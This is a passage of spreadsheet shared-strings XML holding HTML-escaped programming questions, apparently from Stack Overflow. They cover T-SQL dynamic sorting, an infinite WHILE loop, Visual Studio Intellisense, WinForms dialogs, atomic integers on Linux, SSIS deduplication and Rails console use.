    <t xml:space="preserve">&lt;p&gt;This is an issue that I've spent hours researching in the past.  It seems to me to be something that should have been addressed by modern &lt;a href="http://en.wikipedia.org/wiki/Relational%5Fdatabase%5Fmanagement%5Fsystem"&gt;RDBMS&lt;/a&gt; solutions but as yet I have not found anything that really addresses what I see to be an incredibly common need in any Web or Windows application with a database back-end.&lt;/p&gt;
&lt;p&gt;I speak of dynamic sorting.  In my fantasy world, it should be as simple as something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ORDER BY @sortCol1, @sortCol2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the canonical example given by newbie SQL and &lt;a href="http://en.wikipedia.org/wiki/Stored%5Fprocedure"&gt;Stored Procedure&lt;/a&gt; developers all over forums across the Internet.  "Why isn't this possible?" they ask.  Invariably, somebody eventually comes along to lecture them about the compiled nature of stored procedures, of execution plans in general, and all sorts of other reasons why it isn't possible to put a parameter directly into an &lt;code&gt;ORDER BY&lt;/code&gt; clause.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I know what some of you are already thinking:  "Let the client do the sorting, then."  Naturally, this offloads the work from your database.  In our case though, our database servers aren't even breaking a sweat 99% of the time and they aren't even multi-core yet or any of the other myriad improvements to system architecture that happen every 6 months.  For this reason alone, having our databases handle sorting wouldn't be a problem.  Additionally, databases are &lt;em&gt;very&lt;/em&gt; good at sorting.  They are optimized for it and have had years to get it right, the language for doing it is incredibly flexible, intuitive, and simple and above all any beginner SQL writer knows how to do it and even more importantly they know how to edit it, make changes, do maintenance, etc.  When your databases are far from being taxed and you just want to simplify (and shorten!) development time this seems like an obvious choice.&lt;/p&gt;
&lt;p&gt;Then there's the web issue.  I've played around with JavaScript that will do client-side sorting of HTML tables, but they inevitably aren't flexible enough for my needs and, again, since my databases aren't overly taxed and can do sorting really &lt;em&gt;really&lt;/em&gt; easily, I have a hard time justifying the time it would take to re-write or roll-my-own JavaScript sorter.  The same generally goes for server-side sorting, though it is already probably much preferred over JavaScript.  I'm not one that particularly likes the overhead of DataSets, so sue me.&lt;/p&gt;
&lt;p&gt;But this brings back the point that it isn't possible &amp;mdash; or rather, not easily.  I've done, with prior systems, an incredibly hack way of getting dynamic sorting.  It wasn't pretty, nor intuitive, simple, or flexible and a beginner SQL writer would be lost within seconds.  Already this is looking to be not so much a "solution" but a "complication."&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The following examples are not meant to expose any sort of best practices or good coding style or anything, nor are they indicative of my abilities as a T-SQL programmer.  They are what they are and I fully admit they are confusing, bad form, and just plain hack.&lt;/p&gt;
&lt;p&gt;We pass an integer value as a parameter to a stored procedure (let's call the parameter just "sort") and from that we determine a bunch of other variables.  For example... let's say sort is 1 (or the default):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;DECLARE @sortCol1 AS varchar(20)
DECLARE @sortCol2 AS varchar(20)
DECLARE @dir1 AS varchar(20)
DECLARE @dir2 AS varchar(20)
DECLARE @col1 AS varchar(20)
DECLARE @col2 AS varchar(20)
SET @col1 = 'storagedatetime';
SET @col2 = 'vehicleid';
IF @sort = 1                -- Default sort.
BEGIN
    SET @sortCol1 = @col1;
    SET @dir1 = 'asc';
    SET @sortCol2 = @col2;
    SET @dir2 = 'asc';
END
ELSE IF @sort = 2           -- Reversed order default sort.
BEGIN
    SET @sortCol1 = @col1;
    SET @dir1 = 'desc';
    SET @sortCol2 = @col2;
    SET @dir2 = 'desc';
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You can already see how if I declared more @colX variables to define other columns I could really get creative with the columns to sort on based on the value of "sort"... to use it, it usually ends up looking like the following incredibly messy clause:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ORDER BY
    CASE @dir1
        WHEN 'desc' THEN
            CASE @sortCol1
                WHEN @col1 THEN [storagedatetime]
                WHEN @col2 THEN [vehicleid]
            END
    END DESC,
    CASE @dir1
        WHEN 'asc' THEN
            CASE @sortCol1
                WHEN @col1 THEN [storagedatetime]
                WHEN @col2 THEN [vehicleid]
            END
    END,
    CASE @dir2
        WHEN 'desc' THEN
            CASE @sortCol2
                WHEN @col1 THEN [storagedatetime]
                WHEN @col2 THEN [vehicleid]
            END
    END DESC,
    CASE @dir2
        WHEN 'asc' THEN
            CASE @sortCol2
                WHEN @col1 THEN [storagedatetime]
                WHEN @col2 THEN [vehicleid]
            END
    END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously this is a very stripped down example.  The real stuff, since we usually have four or five columns to support sorting on, each with possible secondary or even a third column to sort on in addition to that (for example date descending then sorted secondarily by name ascending) and each supporting bi-directional sorting which effectively doubles the number of cases.  Yeah... it gets hairy really quick.&lt;/p&gt;
&lt;p&gt;The idea is that one could "easily" change the sort cases such that vehicleid gets sorted before the storagedatetime... but the pseudo-flexibility, at least in this simple example, really ends there.  Essentially, each case that fails a test (because our sort method doesn't apply to it this time around) renders a NULL value.  And thus you end up with a clause that functions like the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ORDER BY NULL DESC, NULL, [storagedatetime] DESC, blah blah
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You get the idea.  It works because SQL Server effectively ignores null values in order by clauses.  This is incredibly hard to maintain, as anyone with any basic working knowledge of SQL can probably see.  If I've lost any of you, don't feel bad.  It took us a long time to get it working and we still get confused trying to edit it or create new ones like it.  Thankfully it doesn't need changing often, otherwise it would quickly become "not worth the trouble."&lt;/p&gt;
&lt;p&gt;Yet it &lt;em&gt;did&lt;/em&gt; work.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;My question is then:  &lt;strong&gt;is there a better way?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm okay with solutions other than Stored Procedure ones, as I realize it may just not be the way to go.  Preferably, I'd like to know if anyone can do it better within the Stored Procedure, but if not, how do you all handle letting the user dynamically sort tables of data (bi-directionally, too) with ASP.NET?&lt;/p&gt;
&lt;p&gt;And thank you for reading (or at least skimming) such a long question!&lt;/p&gt;
&lt;p&gt;PS: Be glad I didn't show my example of a stored procedure that supports dynamic sorting, dynamic filtering/text-searching of columns, pagination via ROWNUMBER() OVER, &lt;em&gt;AND&lt;/em&gt; try...catch with transaction rollbacking on errors... "behemoth-sized" doesn't even begin to describe them.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;I would like to &lt;strong&gt;avoid dynamic SQL&lt;/strong&gt;.  Parsing a string together and running an EXEC on it defeats a lot of the purpose of having a stored procedure in the first place.  Sometimes I wonder though if the cons of doing such a thing wouldn't be worth it, at least in these special dynamic sorting cases.  Still, I always feel dirty whenever I do dynamic SQL strings like that &amp;mdash; like I'm still living in the Classic ASP world.&lt;/li&gt;
&lt;li&gt;A lot of the reason we want stored procedures in the first place is for &lt;strong&gt;security&lt;/strong&gt;.  I don't get to make the call on security concerns, only suggest solutions.  With SQL Server 2005 we can set permissions (on a per-user basis if need be) at the schema level on individual stored procedures and then deny any queries against the tables directly.  Critiquing the pros and cons of this approach is perhaps for another question, but again it's not my decision.  I'm just the lead code monkey. :)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Customizing Visual Studio's Intellisense</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A recent project had me working with C# again, and I noticed something I hadn't before -- C#'s Intellisense shows possible exceptions that can be thrown when calling a method&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i38.tinypic.com/2vl4ldg.png"&gt;&lt;/p&gt;
&lt;p&gt;Since I work mostly with VB.NET applications, it'd be really nice to have this feature in those applications as well, but it's unfortunately absent from VB's Intellisense&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i33.tinypic.com/2v1lxf9.png"&gt;&lt;/p&gt;
&lt;p&gt;Is there any quick and easy way I can customize Visual Studio's Intellisense to show exceptions (as well as other members from the XML comments)?  Or am I looking at a full modification using the SDK?&lt;/p&gt;
&lt;p&gt;Update: 29-Sep-2008 1:49 PM -- I figure this will be more complicated than simply changing a configuration setting.  Since the comments are XML-based, I was hoping for an XSLT file somewhere buried in the Visual Studio directory, but nothing has turned up so far.  Looks like I'm going to have to dig into the Visual Studio SDK.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the comma operator do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What does the following code do in C/C++?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (blah(), 5) {
    //do something
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>"Submit" button works in Firefox 3 but not in IE7 (ASP 1.1)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have code from an old website that I needed to modify. There are two pages that I modified some form code in. I modified the max length of a textbox and I modified slightly a line or two of code in a function. The "btnSubmit_Click" function as it happens.&lt;/p&gt;
&lt;p&gt;With the new code FTPed up on the webserver, when I click on the "Submit" button using Firefox 3, the button does what it is supposed to do. With IE7, nothing happens. No page load, no refresh, no error, no nothing. IE isn't busy, it doesn't time out, it does nada.&lt;/p&gt;
&lt;p&gt;On my development laptop however, when I run the project, the submit button works in IE7 as it is supposed to do. &lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Response to Mecki:&lt;/strong&gt;
It is method=POST, but it is a JavaScript postback thing alright. Also I checked the outputted HTML and the Submit button has a JS "onclick" event:&lt;br /&gt;
  onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(); "&lt;/p&gt;
&lt;p&gt;Absolutely though all the required fields have what they need. The validation also works as when I test it by leaving out info from a required field IE7 asks me to fill in the data. Strange one.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Continuations in Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone ever done work to get Ruby to do continuations (like Seaside on Smalltalk)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Php code formatter / beautifier and php beautification in general</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Do you know any good tools for nicely formatting messy php code? Preferably a script for Aptana/Eclipse, but a standalone tool will do too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Search for text between delimiters in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to extract a certain part of a column that is between delimiters.&lt;/p&gt;
&lt;p&gt;e.g. find foo in the following&lt;/p&gt;
&lt;p&gt;test 'esf :foo: bar&lt;/p&gt;
&lt;p&gt;So in the above I'd want to return foo, but all the regexp functions only return true|false,
is there a way to do this in MySQL&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Interlocked equivalent on Linux</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a C++ Linux app, what is the simplest way to get the functionality that the &lt;a href="http://msdn.microsoft.com/en-us/library/system.threading.interlocked.aspx"&gt;Interlocked&lt;/a&gt; functions on Win32 provide?  Specifically, a lightweight way to atomically increment or add 32 or 64 bit integers?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi-line label in RadioButton component (AS3)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm making a small quiz-application in Flash (and ActionScript 3). Decided to use the RadioButton-component for radiobuttons, but I'm having some problems getting the word-wrapping to work.&lt;/p&gt;
&lt;p&gt;The code for creating the button can be found below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_button = new RadioButton();
_button.setStyle("textFormat", _format);
_button.label = _config.toString();
_button.width = Number(_defaults.@alen);
_button.textField.width     = Number(_defaults.@alen);
_button.textField.multiline = true;
_button.textField.wordWrap  = true;
_button.value = _config.@value;
_button.group = _group;
_button.x     = _config.@x;
_button.y     = _config.@y;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;_config is a piece of XML, and _defaults is a piece of XML containing size-information and font-setup&lt;/p&gt;
&lt;p&gt;When I set _button.textField.wordWrap to true, the text gets split into multiple lines, but it's not split at _defaults.@alen, which I want, but looks like it happens pretty much after each word.&lt;/p&gt;
&lt;p&gt;Also, it sometimes splits it into several lines, but doesn't display it all until the mouse hovers over it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to prevent fgets blocks when file stream has no new data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a popen() function which executes "tail -f sometextfile". Aslong as there is data in the filestream obviously i can get the data through fgets(). Now, if no new data comes from tail, fgets() hangs. I tried ferror() and feof() to no avail. How can i make sure fgets() doesn't try to read data when nothing new is in the file stream? &lt;/p&gt;
&lt;p&gt;One of the suggestion was select(). Since this is for Windows Platform select doesn't seem to work as anonymous pipes do not seem to work for it (see &lt;a href="http://stackoverflow.com/questions/152807/what-is-wrong-with-this-popen-select-example" rel="nofollow" title="this post"&gt;this post&lt;/a&gt;).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I persist a ByRef variable into .net winforms dialog form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a "department picker" form that is going to serve as a modal popup form with many of my "primary" forms of a Winforms application. Ideally the user is going to click on an icon next to a text box that will pop up the form, they will select the department they need, and when they click OK, the dialog will close and I will have the value selected for me to update the textbox with.&lt;/p&gt;
&lt;p&gt;I've already done the route with passing the owner of the dialog box into the dialog form and having the OK button click event do the proper update, but this forces me to do a DirectCast to the form type and I can then only reuse the picker on the current form.&lt;/p&gt;
&lt;p&gt;I have been able to use a ByRef variable in the constructor and successfully update a value, but it works only in the constructor. If I attempt to assign the ByRef value to some internal variable in the Department Picker class, I lose the reference aspect of it. This is my basic code attached to my form:&lt;/p&gt;
&lt;pre class="lang-vb prettyprint-override"&gt;&lt;code&gt;Public Class DeptPicker
   Private m_TargetResult As String
   Public Sub New(ByRef TargetResult As String)
      InitializeComponent()
      ' This works just fine, my "parent" form has the reference value properly updated.
      TargetResult = "Booyah!"
      ' Once I leave the constructor, m_TargetResult is a simple string value that won't update the parent
      m_TargetResult = TargetResult
   End Sub
   Private Sub btnOK_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnOK.Click
      DialogResult = Windows.Forms.DialogResult.OK
      ' I get no love here. m_TargetResult is just a string and doesn't push the value back to the referenced variable I want.
      m_TargetResult = "That department I selected."
      Me.Close()
   End Sub
   Private Sub btnCancel_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnCancel.Click
      DialogResult = Windows.Forms.DialogResult.Cancel
      Me.Close()
   End Sub
End Class
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can somebody tell me what I'm missing here or a different approach to make this happen?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note: Code sample is in VB.NET, but I'll take any C# answers too. 8^D&lt;/em&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What needs checking in for a Grails app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What parts of a Grails application need to be stored in source-control?  Some obvious parts that are needed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;grails-app directory&lt;/li&gt;
&lt;li&gt;test directory&lt;/li&gt;
&lt;li&gt;web-app directory&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now we reach questions like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If we use a Grails plug-in (like gldapo), do we need to check in that plugin?  &lt;/li&gt;
&lt;li&gt;Do Grails plugins install in the Grails directory, or your project?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm not looking to start a religious war about .project, so please ignore that, but are there any "hidden" project files I need to worry about, along with the plugin issues?&lt;/p&gt;
&lt;p&gt;Converted to a community wiki, as new versions of Grails have changed some of these solutions, especially as regards plugins.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I share a menu definition between a context menu and a regular menu in WPF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a defined MenuItem that I would like to share between two different menus on one page. The menu contains functionallity that is the same between both menus and I do not want two copies of it. Is there anyway to define a MenuItem in the Page.Resources and reference it in the ContextMenu XAML below?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Page.Resources&amp;gt;
    &amp;lt;MenuItem x:Key="123"/&amp;gt;
&amp;lt;/Page.Resources&amp;gt;
&amp;lt;ContextMenu&amp;gt;
    &amp;lt;MenuItem&amp;gt;Something hardcoded&amp;lt;/MenuItem&amp;gt;
    &amp;lt;!-- include shared menu here --&amp;gt;
&amp;lt;/ContextMenu&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>While-clause in T-SQL that loops forever</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was recently tasked with debugging a strange problem within an e-commerce application. After an application upgrade the site started to hang from time to time and I was sent in to debug. After checking the event log I found that the SQL-server wrote ~200 000 events in a couple of minutes with the message saying that a constraint had failed. After much debugging and some tracing I found the culprit. I've removed some unnecessary code and cleaned it up a bit but essentially this is it&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;WHILE EXISTS (SELECT * FROM ShoppingCartItem WHERE ShoppingCartItem.PurchID = @PurchID)
BEGIN
	SELECT TOP 1 
		@TmpGFSID = ShoppingCartItem.GFSID, 
		@TmpQuantity = ShoppingCartItem.Quantity,
		@TmpShoppingCartItemID = ShoppingCartItem.ShoppingCartItemID,
	FROM
		ShoppingCartItem INNER JOIN GoodsForSale on ShoppingCartItem.GFSID = GoodsForSale.GFSID
	WHERE ShoppingCartItem.PurchID = @PurchID
	EXEC @ErrorCode = spGoodsForSale_ReverseReservations @TmpGFSID, @TmpQuantity
	IF @ErrorCode &amp;lt;&amp;gt; 0
	BEGIN
		Goto Cleanup	
	END
	DELETE FROM ShoppingCartItem WHERE ShoppingCartItem.ShoppingCartItemID = @TmpShoppingCartItemID
	-- @@ROWCOUNT is 1 after this
END
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Facts:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;There's only one or two records matching the first select-clause&lt;/li&gt;
&lt;li&gt;RowCount from the DELETE statement indicates that it has been removed&lt;/li&gt;
&lt;li&gt;The WHILE-clause will loop forever&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The procedure has been rewritten to select the rows that should be deleted into a temporary in-memory table instead so the immediate problem is solved but this really sparked my curiosity.&lt;/p&gt;
&lt;p&gt;Why does it loop forever?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt;: The delete doesn't fail (@@rowcount is 1 after the delete stmt when debugged)
&lt;strong&gt;Clarification 2&lt;/strong&gt;: It shouldn't matter whether or not the SELECT TOP ... clause is ordered by any specific field since the record with the returned id will be deleted so in the next loop it should get another record.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: After checking the subversion logs I found the culprit commit that made this stored procedure to go haywire. The only real difference that I can find is that there previously was no join in the SELECT TOP 1 statement i.e. without that join it worked without any transaction statements surrounding the delete. It appears to be the introduction of the join that made SQL server more picky.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update clarification&lt;/strong&gt;:  &lt;a href="http://stackoverflow.com/questions/150250/while-clause-in-t-sql-that-loops-forever#150400"&gt;brien&lt;/a&gt; pointed out that there's no need for the join but we actually do use some fields from the GoodsForSale table but I've removed them to keep the code simply so that we can concentrate on the problem at hand&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generating 'neighbours' for users based on rating</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for techniques to generate 'neighbours' (people with similar taste) for users on a site I am working on; something similar to the way last.fm works.&lt;/p&gt;
&lt;p&gt;Currently, I have a compatibilty function for users which could come into play. It ranks users on having 1) rated similar items 2) rated the item similarly. The function weighs point 2 heigher and this would be the most important if I had to use only one of these factors when generating 'neighbours'.&lt;/p&gt;
&lt;p&gt;One idea I had would be to just calculate the compatibilty of every combination of users and selecting the highest rated users to be the neighbours for the user. The downside of this is that as the number of users go up then this process couls take a very long time. For just a 1000 users, it needs 1000C2 (0.5 * 1000 * 999 = = 499 500) calls to the compatibility function which could be very heavy on the server also.&lt;/p&gt;
&lt;p&gt;So I am looking for any advice, links to articles etc on how best to achieve a system like this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Whats the best way to start using Mylyn?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've heard a lot of good things about using Mylyn in eclipse.&lt;/p&gt;
&lt;p&gt;How could I set it up to give me a taste of how I could use it?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Selecting unique rows in a set of two possibilities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The problem itself is simple, but I can't figure out a solution that does it in one query, and here's my "abstraction" of the problem to allow for a simpler explanation:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;I will let my original explenation stand, but here's a set of sample data and the result i expect:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ok, so here's some sample data, i separated pairs by a blank line&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-------------
| Key |  Col | (Together they from a Unique Pair)
--------------
|  1     Foo |
|  1     Bar |
|            |
|  2     Foo |
|            |
|  3     Bar |
|            |
|  4     Foo |
|  4     Bar |
--------------
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the result I would expect, &lt;strong&gt;after running the query once&lt;/strong&gt;, it need to be able to select this result set in one query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;1 - Foo
2 - Foo
3 - Bar
4 - Foo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Original explenation:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I have a table, call it &lt;code&gt;TABLE&lt;/code&gt; where I have a two columns say &lt;code&gt;ID&lt;/code&gt; and &lt;code&gt;NAME&lt;/code&gt; which together form the primary key of the table. Now I want to select something where &lt;code&gt;ID=1&lt;/code&gt; and then first checks if it can find a row where &lt;code&gt;NAME&lt;/code&gt; has the value "John", if "John" does not exist it should look for a row where &lt;code&gt;NAME&lt;/code&gt; is "Bruce" - but only return "John" if both "Bruce" and "John" exists or only "John" exists of course.&lt;/p&gt;
&lt;p&gt;Also note that it should be able to return several rows per query that match the above criteria but with different ID/Name-combinations of course, and that the above explanation is just a simplification of the real problem.&lt;/p&gt;
&lt;p&gt;I could be completely blinded by my own code and line of thought but I just can't figure this out. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find the prefix substring which gives best compression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Problem:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Given a list of strings, find the substring which, if subtracted from the beginning of all strings where it matches and replaced by an escape byte, gives the shortest total length.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;"foo"&lt;/code&gt;, &lt;code&gt;"fool"&lt;/code&gt;, &lt;code&gt;"bar"&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The result is: "foo" as the base string with the strings &lt;code&gt;"\0"&lt;/code&gt;, &lt;code&gt;"\0l"&lt;/code&gt;, &lt;code&gt;"bar"&lt;/code&gt; and a total length of 9 bytes. &lt;code&gt;"\0"&lt;/code&gt; is the escape byte. The sum of the length of the original strings is 10, so in this case we only saved one byte.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;A naive algorithm would look like:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for string in list
  for i = 1, i &amp;lt; length of string
      calculate total length based on prefix of string[0..i]
      if better than last best, save it
return the best prefix
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That will give us the answer, but it's something like O((n*m)^2), which is too expensive.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HashSet vs. List performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;It's clear that a search performance of the generic &lt;code&gt;HashSet&amp;lt;T&amp;gt;&lt;/code&gt; class is higher than of the generic &lt;code&gt;List&amp;lt;T&amp;gt;&lt;/code&gt; class. Just compare the hash-based key with the linear approach in the &lt;code&gt;List&amp;lt;T&amp;gt;&lt;/code&gt; class.&lt;/p&gt;
&lt;p&gt;However calculating a hash key may itself take some CPU cycles, so for a small amount of items the linear search can be a real alternative to the &lt;code&gt;HashSet&amp;lt;T&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;My question: where is the break-even?&lt;/p&gt;
&lt;p&gt;To simplify the scenario (and to be fair) let's assume that the &lt;code&gt;List&amp;lt;T&amp;gt;&lt;/code&gt; class uses the element's &lt;code&gt;Equals()&lt;/code&gt; method to identify an item.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to remove duplicate rows from flat file using SSIS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let me first say that being able to take 17 million records from a flat file, pushing to a DB on a remote box and having it take 7 minutes is amazing. SSIS truly is fantastic. But now that I have that data up there, how do I remove duplicates?&lt;/p&gt;
&lt;p&gt;Better yet, I want to take the flat file, remove the duplicates from the flat file and put them back into another flat file.&lt;/p&gt;
&lt;p&gt;I am thinking about a:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;Data Flow Task&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;File source (with an associated file connection)&lt;/li&gt;
&lt;li&gt;A for loop container&lt;/li&gt;
&lt;li&gt;A script container that contains some logic to tell if another row exists&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thak you, and everyone on this site is incredibly knowledgeable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;Update:&lt;/code&gt;&lt;/strong&gt; &lt;a href="http://rafael-salas.blogspot.com/2007/04/remove-duplicates-using-t-sql-rank.html"&gt;I have found this link, might help in answering this question&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strategies for Data Loading and DB Initialization for Integration Tests</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing an integration testing framework for a data intensive J2EE enterprise application and I'm trying to decide upon a strategy for initializing and populating the database. We have a fairly complex model.&lt;/p&gt;
&lt;p&gt;The system will have to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Initialize the system itself &lt;/li&gt;
&lt;li&gt;Load users &lt;/li&gt;
&lt;li&gt;Load application test data&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The test data won't be as complex as the system will handle, load and stress testing is the domain of a specialized test team. We're interested in how well the UI's display what is in the system and that functions integration correctly from top to bottom.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Forms UserControl overrides not being called</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a Windows Forms control derived from UserControl to be embedded in a WPF app. I have generally followed the procedures given in &lt;a href="http://www.codeproject.com/KB/WPF/WPFOpenGL.aspx?display=Print" rel="nofollow"&gt;this link&lt;/a&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ref class CTiledImgViewControl : public UserControl
{
...
virtual void OnPaint( PaintEventArgs^ e ) override;
...
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And in my CPP file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void CTiledImgViewControl::OnPaint( PaintEventArgs^ e )
{
    UserControl::OnPaint(e);
    // do something interesting...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Everything compiles and runs, however the OnPaint method is never getting called.&lt;/p&gt;
&lt;p&gt;Any ideas of things to look for? I've done a lot with C++, but am pretty new to WinForms and WPF, so it could well be something obvious...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Finalizers and Dispose</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a class named &lt;code&gt;BackgroundWorker&lt;/code&gt; that has a thread constantly running. To turn this thread off, an instance variable named &lt;code&gt;stop&lt;/code&gt; to needs to be &lt;code&gt;true&lt;/code&gt;. &lt;/p&gt;
&lt;p&gt;To make sure the thread is freed when the class is done being used, I've added &lt;code&gt;IDisposable&lt;/code&gt; and a finalizer that invokes &lt;code&gt;Dispose()&lt;/code&gt;. Assuming that &lt;code&gt;stop = true&lt;/code&gt; does indeed cause this thread to exit, is this sippet correct? It's fine to invoke &lt;code&gt;Dispose&lt;/code&gt; from a finalizer, right?&lt;/p&gt;
&lt;p&gt;Finalizers should always call &lt;code&gt;Dispose&lt;/code&gt; if the &lt;code&gt;object&lt;/code&gt; inherits &lt;code&gt;IDisposable&lt;/code&gt;, right?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/// &amp;lt;summary&amp;gt;
/// Force the background thread to exit.
/// &amp;lt;/summary&amp;gt;
public void Dispose()
{
    lock (this.locker)
    {
        this.stop = true;
    }
}
~BackgroundWorker()
{
    this.Dispose();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How do I call controller/view methods from the console in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I load &lt;code&gt;script/console&lt;/code&gt;, some times I want play with the output of a controller or a view helper method.&lt;/p&gt;
&lt;p&gt;Are there ways to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;simulate a request?&lt;/li&gt;
&lt;li&gt;call methods from a controller instance on said request?&lt;/li&gt;
&lt;li&gt;test helper methods, either via said controller instance or another way?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How can I serve an image to the browser using Struts 2 + Hibernate 3?</t>
  </si>
  <si>
